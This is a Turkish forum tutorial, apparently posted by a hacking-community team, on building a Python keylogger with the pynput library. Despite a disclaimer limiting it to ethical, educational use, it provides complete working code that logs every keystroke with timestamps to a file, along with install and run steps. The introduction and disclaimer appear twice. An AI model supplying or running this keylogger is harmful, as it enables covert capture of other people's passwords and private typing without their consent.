Merhabalar Ben @bypatnos Lojistik grup adına paylaşılan Python ile Keylogger Yapımı makalesinde sizi görmekten mutluk duyarım.
Bu makalede, Python kullanarak basit bir keylogger yapımını adım adım öğreneceğiz. Keylogger, kullanıcının klavye üzerinden yaptığı her türlü girişi kaydeden bir yazılımdır. Ancak, bu tür yazılımlar genellikle kötü amaçlı kullanımlarla ilişkilendirildiği için etik sınırlar içinde ve eğitim amaçlı olarak nasıl yapılacağını göstereceğiz. Bu bilgi, güvenlik alanında yeteneklerinizi geliştirmenize yardımcı olabilir.
Önemli Not: Keylogger yapımı ve kullanımı yasal ve etik sınırlar içinde kalmalıdır. Sadece izinli ve eğitim amaçlı projelerde kullanılmalıdır. İzinsiz keylogger kullanımı yasal sorunlara ve ciddi etik ihlallere yol açabilir. bilginize
Kod çalıştırıldığında, basılan tuşlar keylog.txt dosyasına kaydedilecektir. Programı test ederken çeşitli tuşlara basarak keylog.txt dosyasını kontrol edebilir ve verilerin doğru şekilde kaydedildiğini görebilirsiniz.
Bu makalede, Python kullanarak basit bir keylogger yapımını adım adım öğreneceğiz. Keylogger, kullanıcının klavye üzerinden yaptığı her türlü girişi kaydeden bir yazılımdır. Ancak, bu tür yazılımlar genellikle kötü amaçlı kullanımlarla ilişkilendirildiği için etik sınırlar içinde ve eğitim amaçlı olarak nasıl yapılacağını göstereceğiz. Bu bilgi, güvenlik alanında yeteneklerinizi geliştirmenize yardımcı olabilir.
Önemli Not: Keylogger yapımı ve kullanımı yasal ve etik sınırlar içinde kalmalıdır. Sadece izinli ve eğitim amaçlı projelerde kullanılmalıdır. İzinsiz keylogger kullanımı yasal sorunlara ve ciddi etik ihlallere yol açabilir. bilginize
1. Gerekli Araçlar ve Kütüphaneler
Python ile keylogger yapımına başlamadan önce, bazı kütüphanelere ihtiyacımız olacak:- pynput: Klavye ve fare olaylarını izlememize yardımcı olur.
- logging: Kullanıcı girişlerini dosyaya yazmak için kullanılır.
Kod:
pip install pynput
2. Python ile Basit Bir Keylogger Yapımı
2.1. Keylogger'ı Anlamak
Basit bir keylogger, klavye girişlerini izler ve bu verileri bir dosyaya kaydeder. Python'da, pynput kütüphanesi bu işlemi gerçekleştirmek için ideal bir araçtır.2.2. Keylogger Kodunun Yazılması
Aşağıda, temel bir keylogger uygulaması için gereken Python kodunu bulabilirsiniz:
Kod:
from pynput import keyboard
import logging
# Log dosyasının ayarlanması
logging.basicConfig(filename='keylog.txt', level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
try:
# Basılan tuşun karakter karşılığını al
logging.info(f'{key.char}')
except AttributeError:
# Özel tuşlar (Enter, Shift, vb.) için
logging.info(f'{key}')
def on_release(key):
# Çıkış komutu (esc tuşu) kontrolü
if key == keyboard.Key.esc:
# Programı sonlandır
return False
# Dinleyici oluşturulması ve başlatılması
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
2.3. Kodun Açıklanması
- logging: Bu modül, basılan tuşları keylog.txt dosyasına kaydeder. basicConfig ile dosya adını, seviyesini ve formatını ayarlıyoruz.
- on_press(key): Bu fonksiyon, her tuşa basıldığında çağrılır. Tuşun karakter karşılığını alır ve dosyaya yazar. Özel tuşlar için key değişkeninin direkt değerini yazar.
- on_release(key): Bu fonksiyon, tuş serbest bırakıldığında çağrılır. Eğer basılan tuş "ESC" tuşu ise, dinleyiciyi durdurur ve programı sonlandırır.
- keyboard.Listener: Bu sınıf, klavye olaylarını dinler ve on_press ile on_release fonksiyonlarını çağırır.
3. Keylogger'ı Çalıştırma ve Test Etme
Kodunuzu bir Python dosyasına (örneğin, keylogger.py) kaydedin. Dosyayı çalıştırmak için terminal veya komut istemcisinde şu komutu kullanın:
Kod:
python keylogger.py
LOJİSTİK TİM SUNDU